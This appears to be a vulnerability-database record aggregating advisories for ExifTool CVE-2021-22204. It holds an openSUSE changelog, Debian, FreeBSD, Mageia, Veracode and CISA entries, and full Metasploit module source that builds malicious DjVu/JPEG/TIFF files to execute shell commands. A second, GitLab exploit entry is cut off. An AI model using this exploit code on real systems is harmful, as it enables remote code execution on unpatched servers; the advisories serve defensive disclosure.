thermal information from DJI RJPEG images\n * Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n * Fixed out-of-memory problem when writing some very large PNG files under\n Windows\n\n version 12.14:\n\n * 
Added support for 2 more types of timed GPS in video files (that makes\n 49 different formats now supported)\n * Added validity check for PDF trailer dictionary Size\n * Added a new Pentax LensType\n * Extract metadata from Jpeg2000 Association box\n * Changed -g:XX:YY and -G:XX:YY options to show empty strings for\n non-existent groups\n * Patched to issue warning and avoid writing date/time values with a zero\n month or day number\n * Patched to avoid runtime warnings if trying to set FileName to an empty\n string\n * Fixed issue that could cause GPS test number 12 to fail on some systems\n * Fixed problem extracting XML as a block from Jpeg2000 images, and\n extract XML tags in the XML group instead of XMP\n - Update URL\n\n update to 12.13:\n\n * Add time zone automatically to most string-based QuickTime date/time\n tags when writing unless the PrintConv option is disabled\n * Added -i HIDDEN option to ignore files with names that start with \".\"\n * Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n * Added ability to write Google GCamera MicroVideo XMP tags\n * Decode a new Sony tag (thanks LibRaw)\n * Changed behaviour when writing only pseudo tags to return an error and\n avoid writing any other tags if writing FileName fails\n * Print \"X image files read\" message even if only 1 file is read when at\n least\n one other file has failed the -if condition\n * Added ability to geotag from DJI CSV log files\n * Added a new CanonModelID\n * Added a couple of new Sony LensType values (thanks LibRaw)\n * Enhanced -csvDelim option to allow \"\\t\", \"\\n\", \"\\r\" and \"\\\\\"\n * Unescape \"\\b\" and \"\\f\" in imported JSON values\n * Fixed bug introduced in 12.10 which generated a \"Not an integer\" warning\n when attempting to shift some QuickTime date/time tags\n * Fixed shared-write permission problem with -@ argfile when using\n -stay_open and a filename containing special characters on Windows\n * Added -csvDelim option\n * Added new Canon and 
Olympus LensType values (thanks LibRaw)\n * Added a warning if ICC_Profile is deleted from an image (github issue\n #63)\n * EndDir() function for -if option now works when -fileOrder is used\n * Changed FileSize conversion to use binary prefixes since that is how the\n conversion is currently done (eg. MiB instead of MB)\n * Patched -csv option so columns aren't resorted when using -G option and\n one\n of the tags is missing from a file\n * Fixed incompatiblity with Google Photos when writing\n UserData:GPSCoordinates to MP4 videos\n * Fixed problem where the tags available in a -p format string were\n limited to the same as the -if[NUM] option when NUM was specified\n * Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for\n Ricoh models\n\n Update to 12.10\n\n * Added -validate test for proper TIFF magic number in JPEG EXIF header\n * Added support for Nikon Z7 LensData version 0801\n * Added a new XMP-GPano tag\n * Decode ColorData for the Canon EOS 1DXmkIII\n * Decode more tags for the Sony ILCE-7SM3\n * Automatically apply QuickTimeUTC option for CR3 files\n * Improved decoding of XAttrMDLabel from MacOS files\n * Ignore time zones when writing date/time values and using the -d option\n * Enhanced -echo3 and -echo4 options to allow exit status to be returned\n * Changed -execute so the -q option no longer suppresses the \"{ready}\"\n message when a synchronization number is used\n * Added ability to copy CanonMakerNotes from CR3 images to other file types\n * Added read support for ON1 presets file (.ONP)\n * Added two new CanonModelID values\n * Added trailing \"/\" when writing QuickTime:GPSCoordinates\n * Added a number of new XMP-crs tags\n * Added a new Sony LensType (thanks Jos Roost)\n * Added a new Nikon Z lens (thanks LibRaw)\n * Added a new Canon LensType\n * Decode ColorData for Canon EOS R5/R6\n * Decode a couple of new HEIF tags\n * Decode FirmwareVersion for Canon M50\n * Improved decoding of Sony CreativeStyle tags\n * Improved 
parsing of Radiance files to recognize comments\n * Renamed GIF AspectRatio tag to PixelAspectRatio\n * Patched EndDir() feature so subdirectories are always processed when -r\n is used (previously, EndDir() would end processing of a directory\n completely)\n * Avoid loading GoPro module unnecessarily when reading MP4 videos from\n some other cameras\n * Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n * Fixed verbose output to avoid \"adding\" messages for existing flattened\n XMP tags\n * Added a new Sony LensType\n * Recognize Mac OS X xattr files\n * Extract ThumbnailImage from MP4 videos of more dashcam models\n * Improved decoding of a number of Sony tags\n * Fixed problem where the special -if EndDir() function didn't work\n properly for directories after the one in which it was initially called\n * Patched to read DLL files which don't have a .rsrc section\n * Patched to support new IGC date format when geotagging\n * Patched to read DLL files with an invalid size in the header\n * Added support for GoPro .360 videos\n * Added some new Canon RF and Nikkor Z lenses\n * Added some new Sony LensType and CreativeStyle values and decode some\n ILCE-7C tags\n * Added a number of new Olympus SceneMode values\n * Added a new Nikon LensID\n * Decode more timed metadata from Insta360 videos\n * Decode timed GPS from videos of more Garmin dashcam models\n * Decode a new GoPro video tag\n * Reformat time-only EventTime values when writing and prevent arbitrary\n strings from being written\n * Patched to accept backslashes in SourceFile entries for -csv option\n\n update to 12.06\n\n * Added read support for Lyrics3 metadata (and fixed problem where APE\n metadata may be ignored if Lyrics3 exists)\n * Added a new Panasonic VideoBurstMode value\n * Added a new Olympus MultipleExposureMode value\n * Added a new Nikon LensID\n * Added back conversions for XMP-dwc EventTime that were removed in 12.04\n with a patch to allow time-only values\n * 
Decode GIF AspectRatio\n * Decode Olympus FocusBracketStepSize\n * Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n * Process PNG images which do not start with mandatory IHDR chunk\n * Added a new Panasonic SelfTimer value\n * Decode a few more DPX tags\n * Extract AIFF APPL tag as ApplicationData\n * Fixed bug writing QuickTime ItemList 'gnre' Genre values\n * Fixed an incorrect value for Panasonic VideoBurstResolution\n * Fixed problem when applying a time shift to some invalid makernote\n date/time values\n\n update to 12.04:\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Change\n\n update to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\n Update to version 11.30:\n\n * Add a new Sony/Minolta LensType.\n * Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n * Decode Reconyx HF2 PRO maker notes.\n * Decode ColorData for some new Canon models.\n * Enhanced -geotag feature to set AmbientTemperature if available.\n * Remove non-significant spaces from some DICOM values.\n * Fix possible \"'x' outside of string\" error when reading corrupted EXIF.\n * Fix incorrect write group for GeoTIFF tags.\n\n Update to version 11.29\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.27\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.24\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.11 (changes since 11.01):\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to 11.01:\n\n * Added a new ProfileCMMType\n * Added a Validate warning about non-standard EXIF or XMP in PNG images\n * Added a new Canon LensType\n * Decode a couple more PanasonicRaw tags\n * Patched to avoid adding tags to QuickTime videos with multiple 'mdat'\n atoms --> avoids potential corruption of these videos!\n\n Update to 11.00:\n\n * Added read support for WTV and DVR-MS videos\n * Added print conversions for some ASF 
date/time tags\n * Added a new SonyModelID\n * Decode a new PanasonicRaw tag\n * Decode some new Sony RX100 VI tags\n * Made Padding and OffsetSchema tags \"unsafe\" so they aren't copied by\n default\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-707=1\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-707=1\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-707=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "suse", "title": "Security update for perl-Image-ExifTool (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-11T00:00:00", "id": "OPENSUSE-SU-2021:0707-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SLQ4XG6SNL6OL7SHPBZLVWYCAEZGZW5X/", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-03-25T13:58:02", "description": "\n\nDebian Security Advisory reports:\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T00:00:00", "type": "freebsd", "title": "Security Vulnerability found in ExifTool", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-01-04T00:00:00", "id": "955F377E-7BC3-11EC-A51C-7533F219D428", "href": "https://vuxml.freebsd.org/freebsd/955f377e-7bc3-11ec-a51c-7533f219d428.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image (CVE-2021-22204). 
\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T20:22:25", "type": "mageia", "title": "Updated perl-Image-ExifTool package fixes a security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-06-16T20:22:25", "id": "MGASA-2021-0259", "href": "https://advisories.mageia.org/MGASA-2021-0259.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-05T02:48:00", "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2663-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMay 16, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nVersion : 10.40-1+deb9u1\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is 
processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T09:42:01", "type": "debian", "title": "[SECURITY] [DLA 2663-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-16T09:42:01", "id": "DEBIAN:DLA-2663-1:D8707", "href": "https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-22T14:51:36", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory 
DSA-4910-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-02T15:47:14", "type": "debian", "title": "[SECURITY] [DSA 4910-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-02T15:47:14", "id": "DEBIAN:DSA-4910-1:4845B", "href": "https://lists.debian.org/debian-security-announce/2021/msg00091.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T10:20:44", "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2663-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMay 16, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nVersion : 10.40-1+deb9u1\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T09:42:01", "type": "debian", "title": "[SECURITY] [DLA 2663-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-16T09:42:01", "id": "DEBIAN:DLA-2663-1:BF6CA", "href": "https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T18:14:57", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4910-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page 
at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-02T15:47:14", "type": "debian", "title": "[SECURITY] [DSA 4910-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-02T15:47:14", "id": "DEBIAN:DSA-4910-1:A1513", "href": "https://lists.debian.org/debian-security-announce/2021/msg00091.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T13:50:50", "description": "perl-image-exiftool is vulnerable to remote code execution. 
A lack of proper neutralization of user data in the DjVu file format in ExifTool allows an attacker to arbitrary code execution by sending a malicious image (jpg, tiff, mp4 and many more).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T01:28:00", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-11T20:32:41", "id": "VERACODE:30159", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30159/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Improper neutralization of user data in the DjVu file format in Exiftool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 
"baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa_kev", "title": "ExifTool Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-11-17T00:00:00", "id": "CISA-KEV-CVE-2021-22204", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-01-07T00:50:08", "description": "This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. 
The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.\n", "cvss3": {}, "published": "2021-05-11T02:02:12", "type": "metasploit", "title": "ExifTool DjVu ANT Perl injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-11T02:11:22", "id": "MSF:EXPLOIT-UNIX-FILEFORMAT-EXIFTOOL_DJVU_ANT_PERL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/unix/fileformat/exiftool_djvu_ant_perl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ExifTool DjVu ANT Perl injection',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in the DjVu ANT\n parsing code of ExifTool versions 7.44 through 12.23 inclusive. 
The\n injection is used to execute a shell command using Perl backticks.\n The DjVu image can be embedded in a wrapper image using the\n HasselbladExif EXIF field.\n },\n 'Author' => [\n 'William Bowling', # Vulnerability discovery\n 'Justin Steven' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2021-22204],\n %w[URL https://twitter.com/wcbowling/status/1385803927321415687],\n %w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031],\n %w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5]\n ],\n 'DisclosureDate' => '2021-05-24',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' => {\n 'DisableNops' => true,\n 'Space' => 2000,\n 'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\\n },\n 'Targets' => [\n ['JPEG file', { template: 'msf.jpg' }],\n ['TIFF file', { template: 'msf.tif' }],\n ['DjVu file', { template: 'msf.djvu' }]\n ],\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('FILENAME', [true, 'Output file', 'msf.jpg'])\n ])\n end\n\n def exploit\n p = payload.encoded\n\n buf = djvu_template.sub('echo vulnerable > /dev/tty', p)\n buf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length\n buf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length\n buf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length\n\n if target.name == 'JPEG file'\n jpeg_buf = jpeg_template\n jpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = jpeg_buf\n elsif target.name == 'TIFF file'\n tif_buf = tif_template\n tif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length)\n buf = tif_buf\n end\n\n file_create(buf)\n end\n\n def djvu_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu'\n ))\n end\n\n def jpeg_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg'\n ))\n end\n\n def 
tif_template\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif'\n ))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/fileformat/exiftool_djvu_ant_perl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-14T08:48:25", "description": "This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. Exploitation will result in command execution as the git user.\n", "cvss3": {}, "published": "2021-11-02T08:46:51", "type": "metasploit", "title": "GitLab Unauthenticated Remote ExifTool Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-03T17:51:37", "id": "MSF:EXPLOIT-MULTI-HTTP-GITLAB_EXIF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_exif_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',\n 'Description' => %q{\n This module exploits an 